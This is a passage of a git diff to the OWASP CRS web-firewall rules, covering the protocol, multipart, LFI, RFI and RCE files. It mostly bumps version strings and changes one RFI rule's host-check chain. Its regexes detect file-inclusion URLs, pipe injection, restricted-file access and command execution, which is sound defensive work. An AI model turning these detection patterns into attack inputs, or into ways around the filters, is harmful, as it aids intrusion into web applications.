REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^!&\(\):<>\|~]*\)[\s\x0b]*(?:\((?:[^!&\(\),<->\|~]+[<>~]?=|[\s\x0b]*[!&\|][\s\x0b]*[\(\)]?[\s\x0b]*)|\)[\s\x0b]*\([\s\x0b]*[!&\|][\s\x0b]*|[!&\|][\s\x0b]*\([^!&\(\),<->\|~]+[<>~]?=[^!&\(\):<>\|~]*)" \ "id:921200,\ phase:2,\ block,\ @@ -250,7 +250,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx ^[^:\( tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/152/248/136',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -283,7 +283,7 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?(?:applicati tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -310,7 +310,7 @@ SecRule REQUEST_URI_RAW "@rx unix:[^|]*\|" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -338,13 +338,13 @@ SecRule REQUEST_COOKIES:/\x22?\x24Version/ "@streq 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:921014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -372,7 +372,7 @@ SecRule ARGS_GET "@rx [\n\r]" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220/33',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -408,13 +408,13 @@ SecRule REQUEST_HEADERS:Content-Type "@rx ^[^\s\x0b,;]+[\s\x0b,;].*?\b(?:((?:tex tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:921016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # @@ -445,7 +445,7 @@ SecRule &REQUEST_HEADERS:Range "@gt 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/210/272/220',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -483,7 +483,7 @@ SecRule ARGS_NAMES "@rx ." \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'TX.paramcounter_%{MATCHED_VAR_NAME}=+1'" SecRule TX:/paramcounter_.*/ "@gt 1" \ @@ -500,7 +500,7 @@ SecRule TX:/paramcounter_.*/ "@gt 1" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" @@ -544,15 +544,15 @@ SecRule ARGS_NAMES "@rx (][^\]]+$|][^\]]+\[)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:921018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-921-PROTOCOL-ATTACK" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # @@ -595,7 +595,7 @@ SecRule ARGS_NAMES "@rx \[" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/PROTOCOL-ATTACK',\ tag:'capec/1000/152/137/15/460',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.http_violation_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl4=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-922-MULTIPART-ATTACK.conf b/rules/REQUEST-922-MULTIPART-ATTACK.conf index 71a5ceda7d..7005d9cb18 100644 --- a/rules/REQUEST-922-MULTIPART-ATTACK.conf +++ b/rules/REQUEST-922-MULTIPART-ATTACK.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -39,7 +39,7 @@ SecRule &MULTIPART_PART_HEADERS:_charset_ "!@eq 0" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ tag:'capec/1000/255/153',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.922100_charset=|%{ARGS._charset_}|',\ chain" @@ -67,7 +67,7 @@ SecRule &MULTIPART_PART_HEADERS "@gt 0" \ tag:'attack-multipart-header',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.multipart_headers_content_counter=0'" SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ @@ -80,7 +80,7 @@ SecRule MULTIPART_PART_HEADERS "@rx ^content-type\s*:\s*(.*)$" \ tag:'attack-multipart-header',\ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ setvar:'tx.multipart_headers_content_types_%{tx.multipart_headers_content_counter}=%{tx.1}',\ setvar:'tx.multipart_headers_content_counter=+1'" @@ -105,7 +105,7 @@ SecRule TX:/MULTIPART_HEADERS_CONTENT_TYPES_*/ "!@rx ^(?:(?:\*|[^!\"\(\),/:-\?\[ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -128,7 +128,7 @@ SecRule MULTIPART_PART_HEADERS "@rx content-transfer-encoding:(.*)" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -152,6 +152,6 @@ SecRule MULTIPART_PART_HEADERS "@rx [^\x21-\x7E][\x21-\x39\x3B-\x7E]*:" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/MULTIPART-ATTACK',\ tag:'capec/272/220',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" diff --git a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf index 36d69c27bc..1ef1ce6b3b 100644 --- a/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +++ b/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:930012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -48,7 +48,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML: tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-LFI',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}'" @@ -81,7 +81,7 @@ SecRule REQUEST_URI_RAW|ARGS|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|FILES|XML: tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-LFI',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ multiMatch,\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ @@ -112,7 +112,7 @@ SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pmFromFil tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-LFI',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -139,15 +139,14 @@ SecRule REQUEST_FILENAME "@pmFromFile restricted-files.data" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-LFI',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:930014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -177,22 +176,22 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@pmFromFile lfi-os-f tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-LFI',\ tag:'capec/1000/255/153/126',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.lfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:930016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:930018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-930-APPLICATION-ATTACK-LFI" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf index 1b7ff0f58c..0edf9a5306 100644 --- a/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf +++ b/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -17,8 +17,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:931012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -55,7 +55,7 @@ SecRule ARGS|XML:/* "@rx (?i)^(file|ftps?|https?|ssh)://(?:\[?[a-f0-9]+:[a-f0-9: tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RFI',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -76,7 +76,7 @@ SecRule QUERY_STRING|REQUEST_BODY "@rx (?i)(?:\binclude\s*\([^)]*|mosConfig_abso tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RFI',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" @@ -97,15 +97,15 @@ SecRule ARGS "@rx ^(?i:file|ftps?|https?).*?\?+$" \ tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RFI',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:931014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # @@ -137,7 +137,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RFI',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ chain" @@ -145,7 +145,7 @@ SecRule ARGS "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b(?:eshare|it "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -# This is a (stricter) sibling of 931130. +# This is a sibling of 931130. # # Regular expression generated from regex-assembly/931131.ra. # To update the regular expression run the following shell script @@ -158,7 +158,7 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b block,\ capture,\ t:none,t:urlDecodeUni,\ - msg:'Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link',\ + msg:'Possible Remote File Inclusion (RFI) Attack',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ @@ -168,25 +168,21 @@ SecRule REQUEST_FILENAME "@rx (?i)(?:(?:url|jar):)?(?:a(?:cap|f[ps]|ttachment)|b tag:'OWASP_CRS',\ tag:'OWASP_CRS/ATTACK-RFI',\ tag:'capec/1000/152/175/253',\ - ver:'OWASP_CRS/4.22.0',\ + ver:'OWASP_CRS/4.23.0',\ severity:'CRITICAL',\ - setvar:'tx.rfi_parameter_%{MATCHED_VAR_NAME}=.%{tx.1}',\ - chain" - SecRule TX:/rfi_parameter_.*/ "!@endsWith .%{request_headers.host}" \ - "setvar:'tx.rfi_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:931016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:931018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-931-APPLICATION-ATTACK-RFI" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf index 5c78ef76eb..28b1b01c58 100644 --- a/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf +++ b/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.22.0 +# OWASP CRS ver.4.23.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2026 CRS project. All rights reserved. # @@ -14,8 +14,8 @@ -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.22.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.23.0',skipAfter:END-REQUEST-932-APPLICATION-ATTACK-RCE" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # @@ -94,6 +94,8 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'O # # .932250 (base rule, PL1, targets two and three character commands) # .932260 (base rule, PL1, targets known command word of length > 3 without evasion) +# .932340 (PL-1, matches commands with no arguments) +# .932350 (PL-3, matches commands with no arguments) # # .932240 (generic detection, PL2, targets generic evasion attempts) # .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2, @@ -119,7 +121,7 @@ SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:932012,phase:2,pass,nolog,tag:'O # (consult https://coreruleset.org/docs/development/regex_assembly/ for details): # crs-toolchain regex update 932230 # -SecRule REQUEST_COOKIES|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 